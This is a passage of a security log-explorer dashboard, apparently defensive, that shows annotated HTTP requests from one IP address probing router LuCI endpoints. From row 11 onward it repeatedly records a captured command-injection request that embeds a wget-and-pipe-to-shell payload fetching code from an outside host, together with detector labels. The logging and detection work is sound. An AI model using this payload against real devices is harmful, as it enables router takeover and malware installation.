Log Explorer

Fact drill-down for 87.121.84.34

Risk 64 MED Scope All time All-time facts 178 In-scope 178 Filtered 178 Seen 2025-06-19 → 2025-07-23

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

cmdi 114 base 64

Top labels (facts, in-scope)

cmdi 114 observed 64

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 4 — total 178 rows

← Prev Next →

#1 2025-07-23 18:56:21 event 13043553 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#2 2025-07-23 18:56:21 event 13043548 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#3 2025-07-23 17:13:50 event 12918049 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#4 2025-07-20 14:49:33 event 12834914 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#5 2025-07-20 14:49:33 event 12834912 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#6 2025-07-20 13:08:26 event 12788258 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#7 2025-07-20 05:13:51 event 12527842 GET 404 bytes 7942

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#8 2025-07-19 21:54:08 event 12274073 GET 404 bytes 7943

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#9 2025-07-18 08:40:20 event 11820784 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#10 2025-07-18 08:40:20 event 11820783 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#11 2025-07-16 15:34:41 event 10886176 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#12 2025-07-16 15:34:41 event 10886175 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#13 2025-07-16 15:34:41 event 10886176 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#14 2025-07-16 15:34:41 event 10886176 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#15 2025-07-16 15:34:41 event 10886176 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#16 2025-07-16 15:34:41 event 10886175 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#17 2025-07-16 15:34:41 event 10886175 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#18 2025-07-16 15:34:41 event 10886175 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#19 2025-07-16 12:36:58 event 10783505 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#20 2025-07-16 12:36:58 event 10783504 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#21 2025-07-16 12:36:58 event 10783505 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#22 2025-07-16 12:36:58 event 10783505 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#23 2025-07-16 12:36:58 event 10783505 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#24 2025-07-16 12:36:58 event 10783504 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#25 2025-07-16 12:36:58 event 10783504 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#26 2025-07-16 12:36:58 event 10783504 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#27 2025-07-15 20:30:14 event 10546545 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

event observed

details

—

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#28 2025-07-15 20:30:14 event 10546545 GET 499

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='n/luci/;stok=/locale?form=country&operation=write&country=$(wget http://141.11.62.222/x/tplink -O-|sh) -'

subnet

87.121.84.0/24

asn

215925 — VPSVAULT.HOST LTD

geo

The Netherlands, Limburg, Eygelshoven

org

VPSVAULT.HOST LTD

#29 2025-07-15 20:30:14 event 10546545 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-|sh)

referer

